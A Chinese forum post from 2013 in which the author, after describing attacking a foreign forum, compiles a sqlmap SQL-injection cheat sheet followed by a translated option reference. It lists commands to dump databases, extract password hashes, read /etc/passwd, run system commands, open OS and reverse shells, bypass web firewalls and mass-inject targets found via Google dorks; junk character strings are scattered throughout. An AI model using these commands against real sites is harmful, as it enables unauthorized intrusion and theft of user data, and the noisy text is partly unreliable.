今天搞国外的一个论坛。发现萝卜和穿山甲都无法正常注入,实在没办法了 还是临时学习了下国外的神器sqlmap的使用方法,,直接做个记录、、
/ h$ W s+ j: Q% g/ {sqlmap -u “http://url/news?id=1″ –current-user #获取当前用户名称sqlmap -u “http://www.xxoo.com/news?id=1″ –current-db #获取当前数 据库名称1 Z9 G- }) d( N6 e0 _
sqlmap -u “http://www.xxoo.com/news?id=1″ –tables -D “db_name”#列 表名
) H7 d6 b3 O1 S' Y. G% @sqlmap -u “http://url/news?id=1″ –columns -T “tablename”users-D “db_name”-v 0 #列字段' U3 F. n s l( H9 i0 T9 D9 s4 u
1 Z: b* z* @& l W' f& _sqlmap -u “http://url/news?id=1″ –dump -C “column_name” -T “table_name”-D “db_name”-v# c/ h- h% T( d5 y
0 #获取字段内容
s q' @7 q* {+ r1 @. }" r , j4 \9 R/ O B' z0 j
******************信息获取******************
: V- _3 N: P. csqlmap -u “http://url/news?id=1″ –dbms “Mysql” –users # dbms 指定数 据库类型
4 Z: D5 J0 M/ F$ c3 asqlmap -u “http://url/news?id=1″ –users #列数据库用户 x( t& e3 l' k- V$ P- k
sqlmap -u “http://url/news?id=1″ –dbs#列数据库 N; J1 M* J& Y# h9 _
sqlmap -u “http://url/news?id=1″ –passwords #数据库用户密码
; k7 ?; q/ ]) A. nsqlmap -u “http://url/news?id=1″ –passwords-U root -v 0 #列出指定用户 数据库密码
% \5 H2 W; k4 Usqlmap -u “http://url/news?id=1″ –dump -C “password,user,id” -T “tablename”-D “db_name”
' I: L" q$ e" V1 {5 \–start 1 –stop 20 #列出指定字段,列出20 条0 `' N/ ?" i2 [$ k3 |6 D, x4 G- Y
sqlmap -u “http://url/news?id=1″ –dump-all -v 0 #列出所有数据库所有表: T2 i( a* _5 C, Y" p, g! R
sqlmap -u “http://url/news?id=1″ –privileges #查看权限
4 [4 @2 L" {- F# @9 fsqlmap -u “http://url/news?id=1″ –privileges -U root #查看指定用户权限sqlmap -u “http://url/news?id=1″ –is-dba -v 1 #是否是数据库管理员sqlmap -u “http://url/news?id=1″ –roles #枚举数据库用户角色. o$ u4 O9 w3 f% T" i
sqlmap -u “http://url/news?id=1″ –udf-inject #导入用户自定义函数(获取 系统权限!)
* K* N1 y, T6 c0 g" R$ ?, [sqlmap -u “http://url/news?id=1″ –dump-all –exclude-sysdbs -v 0 #列 出当前库所有表
; Z9 ], b- G: Jsqlmap -u “http://url/news?id=1″ –union-cols #union 查询表记录
$ }, ?3 Z" Z+ u8 L; g# f& T3 Tsqlmap -u “http://url/news?id=1″ –cookie “COOKIE_VALUE”#cookie注入9 n7 d; A% \, g- W' G
sqlmap -u “http://url/news?id=1″-b #获取banner信息
3 W4 A! H2 q6 b' H# p5 \sqlmap -u “http://url/news?id=1″ –data “id=3″#post注入
" A$ |: \! i. ~" Isqlmap -u “http://url/news?id=1″-v 1 -f #指纹判别数据库类型. ?: Z* q' q$ r0 C1 u
sqlmap -u “http://url/news?id=1″ –proxy“http://127.0.0.1:8118” #代理注 入
% e8 X% W/ ~7 J/ g& M2 Fsqlmap -u “http://url/news?id=1″–string”STRING_ON_TRUE_PAGE”# 指 定关键词
: Z7 {# b6 U/ M. t& V7 Qsqlmap -u “http://url/news?id=1″ –sql-shell #执行指定sql命令
( [, F. |4 F$ Y8 Ksqlmap -u “http://url/news?id=1″ –file /etc/passwd. ?7 T: A5 P" H) k. l( i- E
sqlmap -u “http://url/news?id=1″ –os-cmd=whoami #执行系统命令
& Q) {! u0 `. d, {5 Zsqlmap -u “http://url/news?id=1″ –os-shell #系统交互shell sqlmap -u “http://url/news?id=1″ –os-pwn #反弹shell
8 X% T' }# m( ` esqlmap -u “http://url/news?id=1″ –reg-read #读取win系统注册表5 F% P N- P0 H1 k4 @' W* s1 M2 ]
sqlmap -u “http://url/news?id=1″ –dbs-o “sqlmap.log”#保存进度
# u# e/ W( F2 L+ Msqlmap -u “http://url/news?id=1″ –dbs -o “sqlmap.log” –resume #恢复 已保存进度$ a* k0 _1 q# D
***********高级用法*************
/ ], o2 @2 r) |-p name 多个参数如index.php?n_id=1&name=2&data=2020 我们想指定name参数进行注入
" c' R. @6 w- E( j! D3 isqlmap -g “google语法” –dump-all –batch #google搜索注入点自动 跑出 所有字段 需保证google.com能正常访问8 d; l3 v8 l7 d/ w# i: R
–technique 测试指定注入类型\使用的技术
% ~( o5 x: ~. K, e+ i不加参数默认测试所有注入技术5 y0 p3 z4 e) a2 O' W0 V
• B: 基于布尔的SQL 盲注
4 t' l* }$ Q! T* g• E: 基于显错sql 注入2 l* j, J9 ?9 n4 k/ Z7 Z i! ^5 I# n
• U: 基于UNION 注入4 q% f: ~5 ^6 }0 ?" R9 y
• S: 叠层sql 注入1 Q3 ]( b) ?2 X0 h6 s, p
• T: 基于时间盲注/ e3 p! p( D0 \: K
–tamper 通过编码绕过WEB 防火墙(WAF)Sqlmap 默认用char()
0 T0 [& U5 e( S" I–tamper 插件所在目录. U/ q9 M3 ^$ T, t: q; Z
\sqlmap-dev\tamper
; Q7 V8 `) z1 tsqlmap -u “http:// www.2cto.com /news?id=1″ –smart –level 3 –users # smart 智 能 @: m3 ?" H- x1 s
level 执行测试等级 攻击实例:0 e' r/ C; ^7 K1 c% v) r
Sqlmap -u “http://url/news?id=1&Submit=Submit”
" {- n: _0 g. z/ m–cookie=”PHPSESSID=41aa833e6d0d
% A0 g4 J% b. ^28f489ff1ab5a7531406″ –string=”Surname” –dbms=mysql –user
$ @% a2 R' x/ h; D! {–password0 }" N% J" j0 W# F
参考文档:http://sqlmap.sourceforge.net/doc/README.html
( I* V/ G f+ z! r( {4 D***********安装最新版本*************' h, F5 @0 o1 E. ~" J, T4 e8 ~
ubuntu 通过apt-get install 安装的sqlmap版本为0.6 我们通过svn 来安装 为 最新1.0版
' h- n7 z P6 S6 Q3 @- g/ Qsudo svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
7 k9 a- u* ^- I6 O1 v' z安装的位置为:/home/当前用户/sqlmap-dev/sqlmap.py 直接执行/home/当前用户/sqlmap-dev/sqlmap.py –version 这样很不方便 我们可以设置.bashrc 文件
, h W) P4 R, Ksudo vim /home/当前用户/.bashrc
3 W( Z$ c( z7 h2 v#任意位置加上:/ ^: o* r1 v' J. Z' p
alias sqlmap=’python /home/seclab/sqlmap-dev/sqlmap.py’ 该环境变量只对当前用户有效" s/ s: v. V* _8 p# [+ x
如果想对所有用户有效 可设置全局 编辑下面的文件
% k! s9 X' m |& xvim /etc/profile
# ~+ g7 e% ]0 `8 a: M1 t7 ?: O# k; ?同样加上:: s2 j3 c; Z2 n" H
alias sqlmap=’python /home/seclab/sqlmap-dev/sqlmap.py’ 重启生效/ O9 x3 G: N& B$ o
******************windows 7 (x64) sqlmap install (SVN)************5 \8 E' x& l- s+ D% l# s
http://www.python.org/getit/ 安装python
+ O0 c& e# a3 _0 ghttp://www.sliksvn.com/en/download 安装windows svn client& r/ K2 ~3 f! N( ~7 y
svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev# T: U# D6 s; u+ n/ y& u ]
安装sqlmap& r5 F/ }! K4 _) n( z5 Q
*修改环境变量9 f: A! N1 v4 N2 z; ~/ n+ U: S
–version 显示程序的版本号并退出$ n0 [9 c0 ] f8 z/ i p5 K
-h, –help 显示此帮助消息并退出* R0 n" T1 N. l1 B; s! O M
-v VERBOSE 详细级别:0-6(默认为1)
* U. a7 W) j* A$ gTarget(目标): 以下至少需要设置其中一个选项,设置目标URL。
9 |1 u0 c8 x0 i-d DIRECT 直接连接到数据库。
/ Q, E, \* _0 ]! {( h6 j# i-u URL, –url=URL 目标URL。* n8 n# i/ h6 r6 I8 w8 y4 Z
-l LIST 从Burp 或WebScarab 代理的日志中解析目标。
6 f+ Y" Q4 Z( V+ Q& K2 r% ~ y& c-r REQUESTFILE 从一个文件中载入HTTP 请求。
2 t( U5 H0 W3 S1 ?9 l-g GOOGLEDORK 处理Google dork 的结果作为目标URL。
% j, S1 x5 i$ {/ y- b4 ]-c CONFIGFILE 从INI 配置文件中加载选项。
. F( _. a( t* D; z2 yRequest(请求)::
9 j+ r7 N6 ^0 Z4 J这些选项可以用来指定如何连接到目标URL。
% i; c6 C2 b8 l/ h! {& `–data=DATA 通过POST 发送的数据字符串) s @, \. H9 O5 O9 [/ E
–cookie=COOKIE HTTP Cookie 头
2 y0 }% ~* p6 |–cookie-urlencode URL 编码生成的cookie 注入; [) W f4 I; ~, D5 D$ i
–drop-set-cookie 忽略响应的Set –Cookie 头信息3 X& }8 X/ U9 k5 F, i4 f8 e
4 b h2 |/ C9 t. n" y2 D1 A–user-agent=AGENT 指定 HTTP User –Agent 头8 n6 T+ m' ]& w: k4 D
–random-agent 使用随机选定的HTTP User –Agent 头
# K# f3 s3 l- s2 D–referer=REFERER 指定 HTTP Referer 头
9 C, Z0 l% B2 ^& X$ |–headers=HEADERS 换行分开,加入其他的HTTP 头; y( B/ @; j- }, p$ z4 O( u
–auth-type=ATYPE HTTP 身份验证类型(基本,摘要或NTLM)(Basic, Digest or NTLM), N/ Z" V% v2 d, c2 D: M
–auth-cred=ACRED HTTP 身份验证凭据(用户名:密码)
9 c! o9 V6 x2 z3 p2 B! |1 G- @8 O–auth-cert=ACERT HTTP 认证证书(key_file,cert_file)
, N+ A' n6 g' S* [–proxy=PROXY 使用HTTP 代理连接到目标URL: D5 w% A1 O% _% ]2 u: C2 _4 F
–proxy-cred=PCRED HTTP 代理身份验证凭据(用户名:密码)
, k; d8 @; d' `1 v, H: p–ignore-proxy 忽略系统默认的HTTP 代理/ C& t( u! _+ X4 A# s
–delay=DELAY 在每个HTTP 请求之间的延迟时间,单位为秒* O' [( ^4 b5 G1 N2 h: ]# L# O+ [
–timeout=TIMEOUT 等待连接超时的时间(默认为30 秒)2 _! q9 ~1 @9 A
–retries=RETRIES 连接超时后重新连接的时间(默认3)
$ `7 V" m+ K) i* V" S9 B( g–scope=SCOPE 从所提供的代理日志中过滤器目标的正则表达式
f; g% F T' L7 A: y% Q- T–safe-url=SAFURL 在测试过程中经常访问的url 地址
9 j0 s4 c& U/ p+ H& a% T; Q–safe-freq=SAFREQ 两次访问之间测试请求,给出安全的URL$ p' J9 w! Y0 p l7 h) {: {
Optimization(优化): 这些选项可用于优化SqlMap 的性能。# s i, o; ^5 c2 m' R2 R
-o 开启所有优化开关- k: x8 z. ]& v" R$ ? O& ?: Z
–predict-output 预测常见的查询输出) k; \. f. B9 s
–keep-alive 使用持久的HTTP(S)连接
0 }0 ^1 P- S, ]! F4 f–null-connection 从没有实际的HTTP 响应体中检索页面长度
8 {* H) v5 Q. P5 g0 u2 o–threads=THREADS 最大的HTTP(S)请求并发量(默认为1)- W! S7 o* q4 ], v
Injection(注入):
3 E: P$ o5 D2 F1 N6 x这些选项可以用来指定测试哪些参数, 提供自定义的注入payloads 和可选篡改脚本。
/ d# n; P$ G( _* x-p TESTPARAMETER 可测试的参数(S)( `0 Y" E! Z [' H- [% ?8 C
–dbms=DBMS 强制后端的DBMS 为此值* W9 { u$ J, U4 o
–os=OS 强制后端的DBMS 操作系统为这个值
% H; T# l9 h- [/ X–prefix=PREFIX 注入payload 字符串前缀, }, f; n9 c; t, F4 d
–suffix=SUFFIX 注入 payload 字符串后缀
4 u* B) Z$ b, t1 V% p–tamper=TAMPER 使用给定的脚本(S)篡改注入数据
- |5 b ~9 q5 K% Z. NDetection(检测):
2 I4 [% [2 d! q这些选项可以用来指定在SQL 盲注时如何解析和比较HTTP 响应页面的内容。$ V& b% x: y" B( P/ h1 x
–level=LEVEL 执行测试的等级(1-5,默认为1)6 Y# ]' t" d) D( ^1 X
–risk=RISK 执行测试的风险(0-3,默认为1)' d) C& m; F+ _4 a9 w5 |# B
–string=STRING 查询时有效时在页面匹配字符串
% j6 L* R6 I$ U( m5 y3 N2 ~' ~–regexp=REGEXP 查询时有效时在页面匹配正则表达式
: i2 J+ B8 g0 V8 W* ~/ Q1 A–text-only 仅基于在文本内容比较网页
- _! M6 G4 J |7 k& LTechniques(技巧): 这些选项可用于调整具体的SQL 注入测试。
( N+ [( q4 |- e–technique=TECH SQL 注入技术测试(默认BEUST): W; v. ^* X6 @
–time-sec=TIMESEC DBMS 响应的延迟时间(默认为5 秒)# q5 F9 U& F% V: I! L
–union-cols=UCOLS 定列范围用于测试UNION 查询注入5 Z7 ]8 h* @+ Y0 d# _+ J
–union-char=UCHAR 用于暴力猜解列数的字符& g- v! H! E5 E: C7 g
Fingerprint(指纹):
% n# _1 k) i/ ^1 W# l-f, –fingerprint 执行检查广泛的DBMS 版本指纹
) A' O5 A8 v, p6 I1 i: D6 c* `Enumeration(枚举):
8 B- I( H9 F; Y& p- w* O
: _4 [9 W( D$ U0 E- Y这些选项可以用来列举后端数据库管理系统的信息、表中的结构和数据。此外,您还可以运行您自己 的SQL 语句。
0 N2 `/ Z: t5 [/ N. ^( t% O! ~-b, –banner 检索数据库管理系统的标识" u8 s/ @2 k; Q
–current-user 检索数据库管理系统当前用户
' e ]1 @. g$ ^: X$ q–current-db 检索数据库管理系统当前数据库
m! q# U" c- [' z% M: H! E4 W–is-dba 检测DBMS 当前用户是否DBA1 B7 p5 v' ?2 y3 n' E4 U2 b! T) O
–users 枚举数据库管理系统用户3 n/ i. L, E: N# x T
–passwords 枚举数据库管理系统用户密码哈希+ ~( `9 O6 ]1 E) u$ k
–privileges 枚举数据库管理系统用户的权限
: k5 k; x* ]* \ U; i6 t. w–roles 枚举数据库管理系统用户的角色
& }- D% n7 z9 B3 L$ L–dbs 枚举数据库管理系统数据库! e! r! O- c" l
–tables 枚举的DBMS 数据库中的表
9 X& C7 ^* y& m9 j# {$ Q–columns 枚举DBMS 数据库表列0 @) D( l! _6 \- b
–dump 转储数据库管理系统的数据库中的表项
: _( E, G& O$ Y8 G& _, m# |–dump-all 转储所有的DBMS 数据库表中的条目+ e! e& f! V5 ]
–search 搜索列(S),表(S)和/或数据库名称(S), q9 Z9 ^& b# }( p2 a
-D DB 要进行枚举的数据库名2 z" v7 \5 ]1 F m8 L. N* {9 K
-T TBL 要进行枚举的数据库表
5 D; C. c; ]6 d- E+ n2 W7 J-C COL 要进行枚举的数据库列% A+ \( }9 U6 Y
-U USER 用来进行枚举的数据库用户& c: b; G: k- E. d
–exclude-sysdbs 枚举表时排除系统数据库
4 i* s2 y( G' V+ }2 r–start=LIMITSTART 第一个查询输出进入检索
3 o' Z2 L$ D/ h# f5 c3 \# ]–stop=LIMITSTOP 最后查询的输出进入检索% m: p5 q( _8 s( p3 g
–first=FIRSTCHAR 第一个查询输出字的字符检索# Y0 k: P) C+ l# U0 o
–last=LASTCHAR 最后查询的输出字字符检索
' M% M# A2 ?% `7 K9 e+ m–sql-query=QUERY 要执行的SQL 语句* n6 X6 I5 K% Q! z
–sql-shell 提示交互式SQL 的shell
4 x8 v. r2 J- p1 \; SBrute force(蛮力): 这些选项可以被用来运行蛮力检查。
. ~! {; x) E( s/ F1 h–common-tables 检查存在共同表
) R T3 z' x% Z–common-columns 检查存在共同列
7 b I% e4 e! \7 k% ?/ N9 h- nUser-defined function injection(用户自定义函数注入): 这些选项可以用来创建用户自定义函数。; t j& [/ B/ |: b* T
–udf-inject 注入用户自定义函数, v2 D T9 C: R# i4 }# u
–shared-lib=SHLIB 共享库的本地路径. w: ^; a6 P2 T% x* T* x9 E' a! x
File system access(访问文件系统): 这些选项可以被用来访问后端数据库管理系统的底层文件系统。
% y+ y( C4 q9 r; _# M3 D–file-read=RFILE 从后端的数据库管理系统文件系统读取文件' H0 y0 l9 p# e) z: o' r8 S0 p
–file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件
% j( D8 W" Q0 @1 C5 \–file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径: p3 h" o; [) s; Z2 K
Operating system access(操作系统访问): 这些选项可以用于访问后端数据库管理系统的底层操作系统。- ]4 U+ t y1 ~$ A' \
–os-cmd=OSCMD 执行操作系统命令
N0 A/ L- o. I, t. j–os-shell 交互式的操作系统的shell/ |! n8 b' f$ L3 ?
–os-pwn 获取一个OOB shell,meterpreter 或VNC0 {/ l* m% a6 o `, B
–os-smbrelay 一键获取一个OOB shell,meterpreter 或VNC, C) v8 K4 e4 [
–os-bof 存储过程缓冲区溢出利用. L# G: I3 L2 r# K8 U# V# b$ x
–priv-esc 数据库进程用户权限提升- s6 S6 r3 C ^5 a! S/ c+ m
–msf-path=MSFPATH Metasploit Framework 本地的安装路径
; h2 N% X0 W. E8 z$ f–tmp-path=TMPPATH 远程临时文件目录的绝对路径
; `/ Z' H: {; j, p% J( v! v# o
% x/ T% I1 h( v6 ~# \Windows 注册表访问: 这些选项可以被用来访问后端数据库管理系统Windows 注册表。
* Q* `8 w( \ h" A1 R: Q–reg-read 读一个Windows 注册表项值6 I o* [5 ^ L: W$ w
–reg-add 写一个Windows 注册表项值数据4 z# _& n. z/ ]4 H) S
–reg-del 删除Windows 注册表键值
/ ~: [% f6 ]2 I; C6 V–reg-key=REGKEY Windows 注册表键- Q1 O0 [% Q& ]# l5 A9 n9 J& g
–reg-value=REGVAL Windows 注册表项值
3 m# F* t/ b- ]/ \" b! ?, E–reg-data=REGDATA Windows 注册表键值数据
/ k% h7 W3 k+ A6 Z: `0 Y9 R–reg-type=REGTYPE Windows 注册表项值类型
# k2 \2 H3 ^$ { BGeneral(一般): 这些选项可以用来设置一些一般的工作参数。
( ?% w7 ~) Q; q4 C-t TRAFFICFILE 记录所有HTTP 流量到一个文本文件中! W1 J* e, G% k+ u# K8 e
-s SESSIONFILE 保存和恢复检索会话文件的所有数据
. Y. l5 T; {% ]# m' r–flush-session 刷新当前目标的会话文件
% l! Q* b$ }# c–fresh-queries 忽略在会话文件中存储的查询结果0 m; H" |( M. L4 V# o& f2 o
–eta 显示每个输出的预计到达时间
( u) H. i+ s3 X4 s0 F5 f6 n, A–update 更新SqlMap
6 M+ F$ o+ R) F–save file 保存选项到INI 配置文件$ U( Q' z! }6 t
–batch 从不询问用户输入,使用所有默认配置。. _3 c' S1 G( O3 l" d# L0 L6 |: C
Miscellaneous(杂项):
/ ~, |: G& c6 J+ N- E–beep 发现SQL 注入时提醒
) z+ ?0 B$ S" ~. @–check-payload IDS 对注入payloads 的检测测试
: M) q) T3 w( V, H! M–cleanup SqlMap 具体的UDF 和表清理DBMS
, a( G; a! {& v5 q1 V–forms 对目标URL 的解析和测试形式$ K( T4 h7 S4 }" [, d
–gpage=GOOGLEPAGE 从指定的页码使用谷歌dork 结果- g+ X( B8 K( B: @8 P5 c# g% j/ g+ `1 \
–page-rank Google dork 结果显示网页排名(PR)
+ I) R3 [/ y0 X. @. w–parse-errors 从响应页面解析数据库管理系统的错误消息
$ _ ~0 Y% E/ _8 i–replicate 复制转储的数据到一个sqlite3 数据库
8 j% l8 O X% } U–tor 使用默认的Tor(Vidalia/ Privoxy/ Polipo)代理地址
2 S3 y. Y1 |9 l' c$ D1 I–wizard 给初级用户的简单向导界面 |
发表于 2013-4-4 22:26:32
收藏
支持
反对